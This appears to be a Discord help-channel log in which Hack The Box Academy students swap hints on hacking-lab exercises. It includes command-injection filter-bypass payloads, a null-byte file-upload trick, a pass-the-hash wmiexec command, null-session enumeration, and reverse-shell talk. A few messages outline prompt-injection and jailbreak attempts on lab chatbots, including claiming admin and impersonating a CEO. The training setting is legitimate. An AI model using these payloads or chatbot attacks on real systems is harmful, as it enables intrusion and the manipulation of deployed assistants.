Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.129.2.48
Host is up.

PORT STATE SERVICE VERSION
53/udp open|filtered domain

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

i believe there's an nmap script dns-nsid

also sometimes packet-trace can be helpful if you're not getting the expected results

tried everything not working T_T

PORT STATE SERVICE VERSION
53/tcp filtered domain
53/udp open|filtered domain

try resetting the target, its worked for me when things aren't working correctly

the command you're using should be correct; iirc that's the same command I used. so try resetting the target, changing vpn region, using tcp instead of udp vpn

it worked thank you, wasted so much time on this T_T

after restarting it came with a simple cmd 😄 T_T

I didnt get a rev shell at all, tried a few suggestions from people that DM'd me too.

I went for User Added approach which worked

want to DM me your approach?

Hello, I have a question: I just finished the "Footprinting lab easy". I was able to get the flag and wanted to look at the solution to see how they did it. I don't understand the purpose of the "dig" part. It seems they used it to|| find the second FTP service, but I found it with a simple nmap scan, and even in the solution it shows up in their first nmap scan.|| So why all the DNS enumeration? Is it just for training purposes ? (which is a good point)

I was hoping to have some assistance with the skills assessment for Pivoting, Tunneling, and Port Forwarding. I have gotten to the last box but the network location is disconnected and unable to be reconnected. Even in the 'show solution' inside the module, it has it enabled. Other walkthroughs I have found has the drive enabled already. Is there something I need to do to enable it?

I presume you've restarted the lab just in case its not intentional?

No I haven't. Didn't that would help because I thought the only thing generated was the initial host. I'll do that now

We solved this one together \o/ good job

Hey everyone. I'm working on the Footprinting module and am currently doing the exercises for SMTP. I'm stuck on the second exercise where I'm enumerating the users.

Honestly I've been struggling with all of the "brute force" kind of enumerations. The scans seem to take forever, and I never seem to find anything.

In similar exercises like for DNS enum, I've ended up looking at the solutions just to see that I was doing the right thing but in a slightly wrong way or just with the wrong wordlist or something simple. I'm hoping that someone can help me figure out how to speed up the process or should I just pivot to a different wordlist or new angle if I don't find anything within a minute or two?

Seemed like it failed to pick up the config, given all the resources online and the walkthrough suggest its meant to be available, ill remember to restart if I see that again! ty

I was going crazy like I missed something.. 😂

half the time I am missing something or going crazy so I feel ya, doesn't help xD

anyone can give a small help on Client-Side Prototype pollution I have a locally working exploit not sure what I am missing on remote

@desert pelican ; please don't share screenshots relating to the AEN module as it's tier 2

Are you saying ask help without sharing screenshots?

i'm saying your screenshots break into spoiler territory, I'd say try different proxy tools if one isn't getting you the results you want, like ligolo-ng

Hello please can you help me with exploiting thick clients vulnerability on the attacking common applications I've stuck far too long change the source code but it just gives out a lot of errors

I don't know how I'll compile the invoker well

It's the only one that's giving me issue

'Fatty' either 0xdf or ippsec; that should help

I checked it but it's a different compile that was used

Is there any other that uses javac

probably exists out there, you'll have to do the legwork of researching that on your own

Here on the nibbles web footprinting page we r making an educated guess on the password, is this a better approach than to make use of a wordlist to figure out the password

Well technically it's not, aside from using a tailored word list made from the site guessing is really your best bet especially when the site has an ip blacklist after a few unsuccessful attempts

During the SQLMap Essentials - Attack Tuning module (question "What's the contents of table flag5? (Case #5)"), sqlmap returned a string containing \x02A. The exercise expected the final flag with that sequence replaced by _, but I don’t understand why \x02A should map to _.

Has anyone seen this behavior and could explain it to me please ?

because that's the hex for the ascii code

it's weird, but it checks out

sometimes the attack tuning thing doesn't properly decode characters and you might wanna rerun the attack a few times

okey bcs i checked for the hex ->ascii and it gave me * not _

it's just how timing attacks work, iirc that's the default first one it tries ¯_(ツ)_/¯

Is the DC on AEN US East 1 down for anyone else?

Headline: major network outage at inlanefreight!

there's no specific vpn for AEN; also US East isn't the name of any of the vpn files

Not sure if this is the right channel to ask, so correct me if not. Would my Academy Student subscription remain active after i graduate from uni ? I verified with chat option

that heavily depends on if your uni keeps student/alumni emails active; i suggest using your main email and putting your uni email as a secondary one in your account settings at the very least

I didn't verified using uni email. I used id card verification from support

I mean support can and does regularly check for active enrollment in an institution as far as I know. But that's a question you should ask to support, i'm not staff so I can only guess as to what it is

Oh.. okay. Thanks for your input.

thx !

in the initial foothold section on nibbles how do we decide which plugin to check for rce ?

Usually you'd look for plugins that allow file uploads or if you can upload a plugin yourself even better.

Can someone help with the cwes SQL injection skill assesment? I can't even get the answer to the first question. I've tried all the auth bypass payloads and all the solutions I found posted online are on a different site, inlanefreight

please can someone help me still stuck on the exploiting thick client vulnerability i got the server tho but still stuck cuz it's not running

thanks, that worked.

gonna delete since the module is above tier 0; so spoilers 😉

anyone got the
Introduction to Windows Evasion Techniques module
Process Injection section?

should I go with my own technique of getting shell?

bc the given example is not working out in logs its saying:

[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Undetected by Microsoft Defender Antivirus
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Running C:\Alpha\ProcessInjection\htb-fuck.exe
[10/29/2025 23:27:12] C:\Alpha\ProcessInjection\htb.exe - OK - Checking for calc.exe...
[10/29/2025 23:27:57] C:\Alpha\ProcessInjection\htb.exe - OK - Timeout reached, killing process

what do these errors mean on nibbles monitor.sh file ? although i did manage to get a reverse shell

It means you broke the shell file

remove the -a and should be fine

Oo why did it run successfully tho?

Well, you just broke that part of the shell file, the other parts should be fine

Oh..so that means if I want I can erase the contents of monitor.sh completely, just include my reverse shell payload and still everything will work fine

well, the monitor itself will break

ACTIVE DIRECTORY ENUMERATION & ATTACKS
ACL Abuse Tactics

Q) Work through the examples in this section to gain a better understanding of ACL abuse and performing these skills hands-on. Set a fake SPN for the adunn account, Kerberoast the user, and crack the hash using Hashcat. Submit the account's cleartext password as your answer.

so in the session they used the user wlay to get access to the user damundsen but i dont have the user wlay , so i assumed i gotta use the user htb-student to see weather which acl can i abuse but when i started the enumeration i cant use any command it just stuck , so i cant even get which all users can i abuse . do i need to use the wlay or im going the correct way and just the server is slow ?

but it will still give the reverse shell right?

of course, but just saying it's bad opsec to break someone's script

understood. Thx. I am just curious with all the possibilities

Is there a more reliable ping sweep for powershell/windows?

powershell ping sweep on AEN came back as False for the host when I was doing a 1.100 sweep, now its come back as True on a much closer range (to test if it was a one off)

or is the learning here to re-run sweeps, to double check. IN which case its a low hanging fruit I can do each time

I need a nudge with AI Evasion - First Order Attacks - Challenge 1. Have finished all the flags in this module and only this one is left. Am not able to get the right parameters to balance detection vs the limit. Its a new module. If someone has completed this challenge could you pls DM me.

Try this maybe https://github.com/dexit/fping-windows/releases/tag/fping-4-2-win-binary

thank you, I shall!

You can try the command like this .\fping.exe -asgq 192.168.1.0/24

Bumping this. Still stuck and not really understanding how to forward the port I need. Also not able to get a meterpreter shell, but have a normal shell as SYSTEM on BACKUP.

i have tried downloading linpeas several times now and i can't seem to get the linpeas.sh file. anyone know where it is located or how i can get it ?

Hi everyone, can someone tell me what is the right reasoning to select the right rule and the right mask to resolve the 2nd and the 3rd question of Hashcat section?

when i have an hash, i have no additional informations

try locate linpeas.sh or which linpeas.sh

It is nowhere to be found, both locate en find cannot find it and it seems like the linpeas sh is not in the github li peass

try to reinstall and look if spawn a messagge says the package is already installed

It does says linpeass is installed but the linpeass.sh file is not there. Reïnstall does not work since it already exists

try it and look if some message spawn

[★]$ netcat -nv -p 53 10.129.240.238 50000
Can't grab 0.0.0.0:53 with bind : Permission denied

Hi! In "Incident Handling Process" module, Skills Assessment's first tasks I'm having troubles with connecting to the target from the pawnbox. I try xfreerdp /v:10.129.119.61 /u:htb-analyst /p:P3n#31337@LOG and I get
[06:50:35:669] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:670] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core.transport] - BIO_should_retry returned a system error 32: Broken pipe
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - transport_write:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[06:50:35:723] [34679:34680] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Need hints for fixing it

i have removed linpeass completely and reinstalled it using git clone. linpeass.sh should be in this folder right? (fixed i cloned the whole github itself but i have to download only the linpeass.sh file )

You are not expected to establish an RDP connection

Hi !
I have a question about Documentation & Reporting module. When we write our report, we need to complete the Attack Chain part. But what if we have many options ? Do we need to precise all of them ? I guess so but if there are 100 ways, it is a lot...

Yes, you have to specify every step, and yes, that can be a lot of text.

Hi. Getting high ping on all EU Academy VPN servers. Previously, I used to get around 150 ms which made the experience smoother, but ever since the recent issue with the EU servers, the ping has remained high. Is there any way to resolve this? Thanks.

Note: I am based in South Asia.

Somebody please help me 🙏🏼

This is the only section left of me to complete my path 🙏🏼

Did someone finish the Using CrackMapExec: Skills Assessment, and could give me a nudge on finding the account

Think I've found an error in Command Injections | Identifying Filters

They say to use the other operators [ new line and pipe ] I at first didn't see that line, and other operators work, not sure if that's intended

Ironically - neither \n or | worked for this

https://forum.hackthebox.com/t/try-all-other-injection-operators-to-see-if-any-of-them-is-not-blacklisted-which-of-new-line-is-not-blacklisted-by-the-web-application/271974/11

Yeah this seems to be a bugged module

Hi, I have a question about the Command Injection module. In the section "Bypassing Blacklisted Commands" there is the following exercise:

who$@ami
w\ho\am\i

Exercise: Try the above two examples in your payload, and see if they work in bypassing the command filter. If they do not, this may indicate that you may have used a filtered character. Would you be able to bypass that as well, using the techniques we learned in the previous section?

The first payload works, but the second didn't.
Encoding the backslash as %5C obviously didn't work because of the filter.

Is there an environment variable or something I could use for generating the backslash in Linux?

impacket-wmiexec david@target_ip_here -hashes :david_hash_here
Impacket v0.13.0.dev0+20250130.104306.0f4b866 - Copyright Fortra, LLC and its affiliated companies 

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
inlanefreight\david

C:\>type \\DC01\david\david.txt
Access is denied.

https://academy.hackthebox.com/module/147/section/1638
why doesn't it work, iam logged in under david, but cant read his share

maybe try it with the character shifting technique?

did you url-encode the operator?

Thanks, yes, that's what I'm trying, but I didn't get it working. My VM Bash only understands the shifted version when I echo the command and pipe it to Bash or use eval.

Payloads:
$ w$(tr...
bash: w\ho\am\i: command not found

$ w\ho\am\i
htb-ac-745345

$ eval w$(tr...
htb-ac-745345

$ echo w$(tr...[)i | bash
htb-ac-745345

When I inject that into the web request, the website loads, but the command doesn’t get executed. It might be a command-line error. Even when I shift the pipe character and try to pipe it to Bash, I don’t get a response either. Is there something I'm missing to get it to execute? I've already tried several subshell combinations.

yeah

yoo guys im kinda stuck in file inclusion skill assessment

can i PM anyone to give me an insight on what i might do wrong?

Well, you got it wrong then, the answer is not bugged, just tested.

You didn't URL-encode it

Can guarantee I tried, which is why I linked the forum post I did lol

Not sure what you did. Regardless, I just tested the lab and you can rest assure that everything is working as intended, nothing is broken.

Im on my last days before doing the exam, I'm doing the Skill Assessment for Using CrackMapExec and Im stuck, anyone finished this module who can give me a nudge, I really want to know what I'm missing here

The question is: What's the password of the account you found?
The hint is that I should use a null session, I've tried to following:

proxychains crackmapexec smb 172.16.15.3 -u '' -p ''  --users
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u '' -p '' --pass-pol

proxychains crackmapexec smb 172.16.15.3 -u guest  -p ''  --users
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --shares
proxychains crackmapexec smb 172.16.15.3 -u guest -p '' --pass-pol

You forgetting one method, it start with an "r"

I know what you are saying, it's 2 words right?

Hi All, just started learning & already hit a snag, I'm following the "meow write up" but the nmap is not bringing anything up. what am I doing wrong? I've typed in sud nmap -sV {IP address} i pasted the actual IP address 🙂

Are you connected to the vpn? or on a pwnbox?

pwnbox... i think

you are on the parrot machine in your browser? 😉

yes

i think 🙂

Target is running?

i ping'd it and it was connected

did you try to run nmap with -Pn

Tunnel vision will cause this, as I ran into the same issue. Spawn the target and connect to it. There will be a web interface for you to test your input and completion will give you the flag. Sharing in case others ran into the same issue.

That did happen to me and when I attempted the next day after not getting anywhere I realized that

hi amigos
i'm on Skills Assessment - Password Attacks
i got initial access to DMZ01 machine and then I'm unable to make progress.
tried to forword port from the dmz01 and there is no result!!!!!

any help frendos?

Hello anyone did process injection Attacks and detection module ? How much of a good is it in terms of attacking perspective

can someone help me to do this. this is SQL Injection Fundamentals skill assessment.

Does anyone have 2 seconds? I'm just not sure what this question is asking for as an answer lol

Find the output of the following command using one of the techniques you learned in this section: find /usr/share/ | grep root | grep mysql | tail -n 1

I have the output I just don't know what it wants

Or this command is working just not outputting the answer? Lol?

Working on API Attacks -> Broken Authentication: should I be getting this many errors?

To add - only seeing the following after running that

. ./style.css ./index.php

But I don't see a flag file or anything. Please @ with responses

it's asking for the output, but even then, that doesn't look right

i ran sqlmap on this but couldn't log in. any hint pls

tail -n 1 -> should only give 1 output

sqlmap isn't required for the sql injections fundamentals skill assessment; try injecting in various places

also try forcing an error

That's why I'm confused

i tried as i can(know). that is y i am asking help.🥲

then something went wrong with your command obfuscation 😉

I've tried 4 different ways, all have different outputs, that aren't aligning with each other, and it's the same command lol

maybe you're looking at the login too early 😉

i watched a yt video and that skill assessment was different than mine. atleast there is not a hint. can u give a hint for find admin's password hash

If I follow the Hex signature in the memory map and try to dump to file, it looks like an unfinished program and cannot be inspected properly. honestly getting lost at this section with 0 reverse knowledge

Could anyone give me a few hints regarding the Module sqlmap -> Challenge6... I have not worked too much with SQL before and I have no clue, how I should get to the correct prefix? Any tipps?

look into other endpoinnts first

that module is above tier 0; don't share screenshots from the module/lab

Nevertheless, I have solved the exercise, but imho it's the worst exercise in pentesting path so far. I don't know what happens on the screen, the explanation is not clear enough... No introduction to reverse engineering (is this even a part of the path), so it's hard

join the haters club for it (plenty of people agree that it's completely out of left field and not relevant or wanted in the path)

at least i'm not alone

Hey guys I need help with something on Attacking Enterprise Networks module

Hello, I'm having a problem in the Linux Fundamentals section, specifically in the "Filter Content" part of the last question where I'm asked to use curl. I don't know if my command is wrong or if I've missed something. If someone could help me out, that would be great.

As you can see, I did it offline in the first instance, and online in the second (screenshot).

I've also been stuck in this part for a few days

It's not easy to understand, hopefully someone can help us x)

You cant do this one offline, also academy targets (10.129.x.x) dont have internet connectivity. If youre on the free account I believe that the pwnbox doesnt have access to https://inlanefreight.com

Can I do it directly from my Linux machine on my PC?

I just finished working on The Live Engagement module under shells & payloads section. Would anyone be able to let me know how we were we supposed to find creds for host 1 ‘manage’?

If spoiler pls delete

from here its starting to get tougher if you will just follow the module lectures. you need to think outside the box. However, if you haven't look at the "hints" you need to otherwise you'll scratch your trying to figure out what's next. I also find trying to take a peek at the solution after doing all things is not bad at all.

Guy i need help, i already add inlanefreight.local to the hosts file, but when i used ping or getent hosts it can't resolve the name why?

if i just ping the IP address, it works normally.

Yoo guyss, i need help with the file inclusion skill assessments, my RCE attempts is always failed and im sure it is using the method i use

Yeah I ended up having to use the hint. I found one of the vectors by enumerating but the second one I could not find creds anywhere :(. I feel bad using a hint sometimes but I try to learn from them.

Agreed! It's working as it should.

try it with base64 encoding

I am currently working on API Attack module, and stuck in Broken Object Property Level Authorization

Anyone available for help\

I am not able to find one of the apis for the relevant role

All 4 things I've tried included B64

Maybe it's not intended to work in that specific question due to filters in place. Try it in the next section perhaps.

base64 works just fine dm me what you tried

Try scanning common ports like 445,3389,5985 etc... etc

Otherwise try a different pivoting method/tool

I was able to get into another machine however I am now struggling to transfer files from the Windows server onto my attack host. I have tried moving the file into an SMB share and doing it that way, but i can't access the share.

Plenty of rdp tools have an option that allows mounting a drive, xfreerdp has the /drive: option

let me give that a try

Got it

Legit spent an hour trying to get it through command line....

Thank you

For Module "MSSQL, Exchange & SCCM Attacks" on Section "Introduction to SCCM" I'm facing an issue using pxethief.py. I'm using exactly the same command as given on the module and I keep getting this error response:

[-] No DHCP responses recieved from MECM server 172.50.0.30. This may indicate that the wrong IP address was provided or that there are firewall restrictions blocking DHCP packets to the required ports

I already tried to reset the machine, but it's still not working. I also tried other interal IP addresses as well I found while enumerating. Nothing seems to work. If someone can help, thanks!!!

also try Invoke-FileUpload.ps1

is it a vm?

Yup. I've RDP'd to the given Windows Machine

bridged or nat

I did try that at one point, however I could not download the module from github on the windows machine.

Do you mean the HTB's Windows VM?

oh no i mean your base machine

My base's NAT'd.

you mean you tried download from github on target machine?

swap to bridged

Yes that is correct

Well, the target machine is in internal network which means no internet connection, we need to transfer from attack host to target windows.

only thing I can think of atm - can cause dhcp issues

Do you mean that's the reason I couldn't solve it? How does the network config affect HTB's machine as it's internal network?

Yes, however this whole module I have been having trouble with proxychains and running commands on my attack host.

It has been a constant nightmare of connection errors. And now I am trying to get the NTDS.dit file and am unable to via netexec because of these issues that I am having.

I don't know if that's the reason, but it can deffo mess with that

it's like a 2 second thing anyway so like if it doesn't work meh

I tried using Pwnbox and got the same error.

I was able to grab the hash and complete the skills assessment. Easily the hardest skills assessment thus far.

nat drops l2 broadcast packets - only reason i suggested it >.<

I see! Have you finished the module? If you did - do you recall any issues using pxethief.py?

na i just started but work stuff

that's actually the exact module i'm excited for since relevant

Ah, you just started the module? Good luck!!

no no the cape material X:

but that's the module i'm after ya

since sccm attacks are kind of hot rn

I see! It's been amazing path. This is my last module I'm working on. Love it

can you ping it and all that?

Yes I can ping the IP

you already reset it too

Yah, twice even 😄

On this same section now myself and having the same problem. Nothing gone over in the section seems to work.

@acoustic owl any ideas?

^ this guy has a cape lol maybe he can help XD

If I recall correctly, I had a Ligolo pivot active before attempting this.

are you allowed to post the actual cmd?

Hello! So did you attempt to coerce PXE boot from another host than SRV05?

I have a tunneled connection running, but I'm unsure how this will benefit me on this question. If you can DM me I'd highly appreciate it, thanks...!!!

The original command?

thx @foggy monolith x; sorry if I tossed ya under the bus - sooo didn't mean to

ya

i always screw up discord rules in srvrs bc i'm in so many ;/

so i am trying to be careful

Sure, I don't see how it'd be a spoiler:

python .\pxethief.py 2 172.50.0.30

Yes I did and was successful, but only when I used the Windows version of Python on SRV05 to run it. Something that needs to be emphasized I think.

Update: seems like you've got that down.

Maybe try a lab reset too. Also, I was logged in as the test user, not sure if that helps.

That's okay. I've resetted the lab a few times now and also running as the test user that's given.

I'll try another host as the attack host than SRV05, if it's possible 👍

https://www.thehacker.recipes/ad/movement/sccm-mecm/

Meanwhile, am I like the only one here who's working through the AI job role path or something?

I started it and literally stopped myself :3

since I actually have to study and focus on the cape

and I'm super adhd soooooo I would have just ended up doing that and not what I needed

lol

Never mind, got it. Had to chain something from Jailbreaks I with something else from Jailbreaks II.

Can someone provide a real world example of how I could apply the model learned in “Questioning” under “The process” in the “Learning process” module?

It was a lot of reading and seemed a bit too much. I don’t really get the takeaway lol. Or is it the whole visual model / diagram that should be used?

Thanks in advance for your time everyone!

Haha, I can relate as being diagnosed with ADHD. I'm hyper-fixated on the CAPE path and can't think of doing anything other than grinding the modules non-stop.

Its a general visual model from what I recall. I dont remember too much from that module tbh its been a bit

Thanks, I thought so, seemed worth while to check.

To clarify further it’s something more for yourself to help with phrasing a question?

Yeah, phrasing questions can help you either clarify how you approach it (rubber ducky) or help others help you

Im getting errors ❎
Im getting <specific error> ✅

Great, I thought so. Very, very long winded way to explain the concept 😅

It probably helped me most that I’ve known about similar models / concepts beforehand.

Maybe my brain just hasn’t been working for the past three days. Thanks for your time clarifying!

Its alright, you can either take the module to heart or just discard most of it. Its mostly just theory

Howdy! I'm currently working on the Footprinting module, and in the SMB section. I've managed to connect to the correct SMB share, and found the flag.txt as it requests, however the flag does not seem to be accepted by the answer section, and states it as being incorrect. I'm not quite sure where to go from here, because of that hah!

check for leading/trailing spaces

Aye, unfortunately, that does not seem to be the error

Its formatted correctly as far as I can tell, cleanly copied, etc

is it one of those flags that is a hash or an HTB{} flag?

It is indeed one of the HTB{} flags

could you DM me the flag and a screenshot of the question not accepting it?

Sure!

arent there supposed to be creds to rdp?
it is in the "YARA & Sigma for SOC Analysts"

check the hint

oh that works aswell, tysm!

Hi all, I'm new and asking for any help with this module:
Attacking AI - Application and System
Section: Rogue Actions

I appreciate any suggestions or guidance on this! Or even anyone facing the same issue. 👏

So far I can successfully claim admin and the chatbot says SQLQuery plugin is available, and I've checked the database: db, tables: items, and column: id. It only contains ids: 1-4 as far as I can tell.

Should I be looking at a different attack vector entirely?

I've also tried the username injection, however, little success with that method as the chatbot skips over displaying username with payload.

Hello!
I have troubles connecting to the Windows targets in the Windows Fundamentals module. It dose not matter if i connect over my local machine using the VPN or if i use the PWNBOX. The connection gets permanently terminated. I also tryed to spawn the target agein, but without success. Any help is apprichiated!

try changing vpn regions, also making sure you're not using both the VPN and the PWNBOX at the same time, use TCP vpn

im stuck at the same assesment. i've tried poking around in all the fields. but i havent been able to bypass or inject into any of them.

@austere pine you're thinking about it wrong; when you force an error that means you may be doing something right (even if the error isn't reflected back at you)

i dont understand. is my input going to the database even if its getting sanitised? i dont know how i can get what i want with that since, nothings worked so far

you know that something causes a 500 error; a 500 error isn't necessarily a bad thing you know...

i will say you were onto something with the parameter @austere pine ;

thanks for the help my brain is fried rn. i will sleep on it and maybe when i wake up the answer will appear

you'll discover the True path in the end 😉 but rest well

I am having trouble rdp'ing(with xfreerdp) into remote machines and my standard way is not working(i usually add the dynamic-flag) because when I do it the standard way the screen is usually greyed out. I tried all of the recommendations online and they are not working.

xfreerdp /v:10.129.250.12 /u:.\Administrator /p:"AnotherC0mpl3xP4$$" /size:1920x1080 /bpp:32 /cert:ignore /rfx

[04:24:39:861] [13938:13939] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:24:39:861] [13938:13939] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

What do you recommend I do

wrap the password in singlequotes

bash is evaluating $$ to the current shell PID

single quotes is strict string parsing, not hybrid

also you don't need to do the .\ for the username

NTSTATUS: STATUS_LOGON_FAILURE <- this indicates an error with the username and/or password

xfreerdp /v:10.129.250.12 /u:.\Administrator /p:'AnotherC0mpl3xP4$$' /size:1920x1080 /bpp:32 /cert:ignore /rfx
[04:38:48:451] [35358:35359] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[04:38:48:451] [35358:35359] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

So only remove that?

yes

remove that as well

This solution work(in case anyone else experienced similar problems)xfreerdp /v:10.129.250.12 /u:Administrator /p:'AnotherC0mpl3xP4$$' /f /bpp:32 /cert:ignore /rfx

Regarding this that I asked earlier, I got a response from HTB support.

It’s an issue with their EU VPN Server. They told me it should work on the US server.

Just heads up if anyone else having lab issues 👍

Yep, I'm in the "Citrix Breakout" module and when I rdp into the machine I get the Xfce desktop environment. Is that intended? It doesn't make much sense to me

It was a long time ago so I don't remember, but you are you on the EU VPN server? I was having major issues on EU VPN and support told me to switch to the US Servers.

Yes, EU server. Earlier I couldn't even log in. Now I get this Xfce desktop which is weird, because it's unix based and I'm supposed to work on a Windows machine

try changing to US vpn server

Change to US VPN. I wasted too much time because EU not working

Ok, thanks

Is something wrong with EU VPN servers? Getting very high ping. The https://status.hackthebox.com/ says otherwise. Thanks.

seems like it's having issues rn; try US servers.

I did, but the ping is high there as well due to my region. I’m based in South Asia, so the US servers don’t perform well for me. The EU servers used to be really smooth, but unfortunately, they haven’t been working properly lately.

reach out to support, but if it's the EU servers having issues then you're gonna have to wait for the EU servers to stop being silly, or suffer the lag of US servers

Yes you can

Can I get a nudge for the Command Injections | Skill Assessment? I'm damn near pulling my hair out, I've tried damn near everything I can think of, and all I get in return from Burp is a 302 Found but no contents. I don't know if I have the wrong injection point or what, but I'm going crazy

dm please

Currently I am working on the Applications of AI in Infosec course skills assessment. I've created the model, trained it using GPU and evaluated it locally with accuracry ~94%. However, when I try to uplaod it I get "invalid model file".

Does anyone know if it is required to upload a .joblib or is a .pth allowed?

anyone else have a lot of truble with the module "Intro to C2 Operations with Sliver "?

The RDP and the connection in general are extremely unstable

can someone help me with File Upload Attacks whitelist filters module? i cannot seem to fuzz the correct extension and also i can upload for instance shell.php\x00.gif but i cannot execute gif file any hints to help me out? i've been stuck for hours

did you do it? i can help

dm me

Hey all, in the socks over rdp module in the double pivoting section, this just doesn't seem to work:

regsvr32.exe SocksOverRDP-Plugin.dll

This is all I get haha

Real time threat protection is turned off btw

Were you able to get it?

https://tenor.com/view/doubt-press-x-la-noire-meme-x-button-gif-19259237

I’m just as confused lmfao

Try this:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://IPHERE -H 'Host:FUZZ.inlanefreight.local'

and make sure to use -fs when you have an idea which size is incorrect so you can filter it out

update local to .com if that is the target ofc

The above works for my needs, so should yours. Not sure otherwise

does inlanefreight.com respond to icmp requests? i'm trying to ping it but not getting anything. i'm not sure if i'm having network issues

i can reach www.inlanefreight.com in a brower no problem

I don't get a ping back either... by design perhaps?

Hi there, anyone willing to discuss about SSRF API module attack path?, to send he/she a DM!!

defender being off != RTP being disabled

that module doesn't use an ip for this it's attacking a publicly available website

it's not designed to accept icmp echo requests, as far as I know

also @cosmic vine don't reveal potential answers, even behind spoiler tags...

roger, good spot. Just grabbed from my notes and moved on..oops

notes are good if you know when and how to apply them 😉

https://tenor.com/view/ricolino-scolari-gif-12061360726599077047

I deserve that

all good; you tried to help, it just wasn't applicable in this specific instance

Hello, someone could help with the API Attak skills assessment? ||Trying to reset a supplier password with the security question... ||

Hello there!
Quick question ffuf wise :
ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://IP:PORT/w2ksvrus/FUZZ.html -e .php,.html,.txt,.bak,.js -v
→ This command will fuzz for .../config.php.html, .../config.html.html, .../config.txt.html,... yadeeyada, correct ?

correct, it appends the extension (From what I recall) directly after, i mean one way to know for sure is to just test it out... though why you'd do a double ext is beyond me

Check your DMs, I sent you 2 of them on this matter.

@icy dagger are you open as well?

I'm just very confused because this should be a fairly straightforward task. It's a public facing site which doesn't require any additional configuration. The solution doesn't match what I'm seeing. I'm seeing some of the subdomains but not all so it's almost as if those subdomains don't exist anymore

Hi all — I’m blocked on the SQLMap essentials - Skills Assessment. I’ve been probing the app with Burp and reviewed every request in the proxy, but there are no GET requests with query params and no POSTs that look relevant. I also tried interacting with the site (commenting, adding products to cart, going through checkout, clicking blog links) and still can’t find a suitable input point. If someone who’s completed it can share a hint about where to look next (not the full solution), that would be super helpful. Thanks!

For context, I was able to ||get the chatbot to pretend to be the CEO while divulging information that would absolutely get any CEO banned from his or her own company|| but the prompt necessary to do that was so long that I got a "Prompt length is longer than max length" error (screenshots in DM if you're reading this @terse sage) when throwing the summary bot at the resulting conversation. @icy dagger any ideas?

One request you mentioned should have worked unless they changed it

I think they changed it. If I’m thinking correctly, to me there’s an obvious one, but I only get the #.

What’s the question

They haven't changed it

Also think of a possible WAF idk?

Likely overlooked something

@vapid sierra then in that case you’re on that right track and it’s in one of those you mentioned, pretty obvious to what the website is all about..

mmmh thx a lot !

@fathom pendant any ideas on bloat-trimming this?

If you still stuck, feel free to dm me.

Haven't done the module, couldn't tell ya

Okay, I found it — it was a bit ambiguous.

Thx again

I wanna help In HTTPs/TLS Attacks Module Skill Assessment can I DM anyone please

Alright, figured it out on my own. For those curious, yes the information gathered from step 1 absolutely needs to be reused for step 2 to work at all.

Find out the machine hardware name and submit it as the answer. Could someone help me with this?

uname --help to figure out which might get you the hardware name

I did it, thank you so much!

Yes, I’m aware, RTP is disabled

Hmm, I’m getting this error on literally the first machine lol

they're saying they used ligolo to bypass the fuckery i think lol.

pivoting tunnelling path in remote/reverse port fwding w/ ssh finding it hard to get a reverse shell is there a step missing in the module? I'm following exactly as laid out in the module but feels like there's something missing bc it mentions to download the payload in windows box prior to getting a reverse shell executed of the same box? This is separate from challenge questions

sorry guys I know this is the wrong chat for this but Im struggling with the machine Reddish and I remember hearing that it's broken, is that still the case?

Sorry!